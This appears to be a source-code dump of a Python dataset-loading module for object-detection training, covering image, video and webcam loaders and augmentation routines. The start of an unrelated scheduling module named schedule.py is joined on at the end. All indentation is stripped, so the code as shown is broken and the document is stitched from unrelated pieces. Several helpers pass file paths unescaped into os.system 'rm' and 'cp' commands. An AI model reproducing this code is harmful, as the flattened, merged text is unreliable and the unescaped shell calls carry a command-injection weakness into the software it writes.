files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [
x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [
x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert (self.nf > 0), (
'No images or videos found in %s. '\
'Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats))
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (
self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [
letterbox(x, new_shape=self.img_size, auto=self.rect)[0]
for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, rank=-1):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace(os.path.splitext(x)[-1], '.txt') for x in img_paths]
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted(
[x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats])
assert len(self.img_files) > 0, 'No images found'
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Read cache
cache.pop('hash') # remove hash
labels, shapes = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Check labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = enumerate(self.label_files)
if rank in [-1, 0]:
pbar = tqdm(pbar)
for i, file in pbar:
l = self.labels[i] # label
if l is not None and l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
if rank in [-1, 0]:
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
if nf == 0:
s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
print(s)
assert not augment, '%s. Can not train without labels.' % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
im = Image.open(img)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
print('WARNING: Ignoring corrupted image and/or label %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 32), np.mod(dh, 32) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='path/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def recursive_dataset2bmp(dataset='path/dataset_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='path/images.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
|
schedule.py
|
#!/usr/bin/env python3
"""Module for the scheduling of observations."""
__author__ = 'Philipp Engel'
__copyright__ = 'Copyright (c) 2019, Hochschule Neubrandenburg'
__license__ = 'BSD-2-Clause'
import copy
import logging
import threading
import time
from typing import Any, Callable, Dict, List
import arrow
from core.manager import Manager
from core.observation import Observation
from core.prototype import Prototype
class Job:
"""
Job stores an observation object and sends it to a callback function if the
current date and time are within the set schedule.
Args:
name: Name of the job.
project_id: ID of the project.
node_id: ID of the sensor node.
port_name: Name of the (serial) port.
obs: Observation object.
is_enabled: If True, job is enabled.
start_date: Date to start the job.
stop_date: Date to stop the job.
weekdays: Dict of days and times to run this job at.
uplink: Callback function to send the observation to.
"""
def __init__(self,
name: str,
port_name: str,
obs: Observation,
is_enabled: bool,
start_date: str,
end_date: str,
weekdays: Dict[str, List],
uplink: Callable[[str, Dict[str, Any], Dict[str, Any]], None]):
self._name = name # Name of the job.
self._port_name = port_name # Name of the port module.
self._obs = obs # Observation object.
self._is_enabled = is_enabled # Job is enabled or not.
self._weekdays = weekdays # The time sheet.
self._uplink = uplink # Callback function.
self.logger = logging.getLogger('job')
# Used date and time formats.
self._date_fmt = 'YYYY-MM-DD'
self._time_fmt = 'HH:mm:ss'
